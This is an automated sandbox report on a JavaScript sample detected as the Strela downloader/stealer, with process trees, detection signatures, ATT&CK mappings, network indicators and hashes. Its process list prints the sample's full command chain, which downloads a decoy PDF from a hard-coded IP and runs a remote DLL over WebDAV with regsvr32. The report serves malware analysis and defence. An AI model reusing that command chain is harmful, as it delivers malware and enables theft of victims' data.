Windows
Analysis Report
18731127942186526806.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 6888 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\18731 1279421865 26806.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7056 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\422 6262942929 9.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7052 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6236 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 3192 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 4944 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7252 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 20 --field -trial-han dle=1680,i ,751229562 4903546431 ,243209388 1699384819 ,131072 -- disable-fe atures=Bac kForwardCa che,Calcul ateNativeW inOcclusio n,WinUseBr owserSpell Checker /p refetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 3992 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | Virustotal | Browse | ||
5% | ReversingLabs | Script-JS.Trojan.StrelaStealer |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588558 |
Start date and time: | 2025-01-11 02:21:58 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 51s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 16 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 18731127942186526806.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/59@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 2.16.168.107, 2.16.168.105, 34.237.241.83, 54.224.241.105, 18.213.11.84, 50.16.47.176, 172.64.41.3, 162.159.61.3, 184.28.90.27, 23.209.209.135, 23.200.0.177, 23.200.0.196, 192.168.2.4, 4.175.87.197, 23.217.172.185, 13.107.246.45
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
20:22:54 | API Interceptor | |
20:22:59 | API Interceptor | |
20:22:59 | API Interceptor | |
20:23:12 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 1.3073493717431168 |
Encrypted: | false |
SSDEEP: | 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrG:KooCEYhgYEL0In |
MD5: | 8996ED085ED8985AB96AFDADBB52947C |
SHA1: | DDAC72420D9C0CC4F16DDC32512AEBB4928E2694 |
SHA-256: | 471BAB202A97CE7916E24679F5EC3E891FFFDFF3B460D024306C2297F57ED445 |
SHA-512: | E75F364CD05932AF665E447C5A91D4451D8654C3C51A5F549D1FD0EB974F1871D67EC2FA3C1D96D3CDBC1AF9914FA0975815578C612141F620BBF6042C78C0B8 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.42205575227578096 |
Encrypted: | false |
SSDEEP: | 1536:BSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Baza/vMUM2Uvz7DO |
MD5: | FE02149AF12AA3DB7B44800BF7550778 |
SHA1: | 3E4FA21C69DCC1E848C63CE59B85750DA2E18776 |
SHA-256: | 5906A83C012B031DC24F2F4749674BD235A49D68500D335931AF305CC446BBBD |
SHA-512: | 7941454209602F5F0F252ACDD2508FDFE3C9C652635B22283FC6E0DE6AE36AAAB6A44FE50FB275C77B980C2830B649E3A03563CCCDA28E7CB28CF3C6BF68967E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07358187008366454 |
Encrypted: | false |
SSDEEP: | 3:sS6YeS3rYEkjn13a/CfwK/allcVO/lnlZMxZNQl:sdzSrYB53qbKGOewk |
MD5: | 924A0E1AE5F0AA48C8F2357A5784F5BC |
SHA1: | 216239EE14A644CAB9E5C89AAA83BE8028A327F9 |
SHA-256: | C40A63B60909638AA2007E5ACB518D93916A232BAEF6D36D4857240FEFED1F16 |
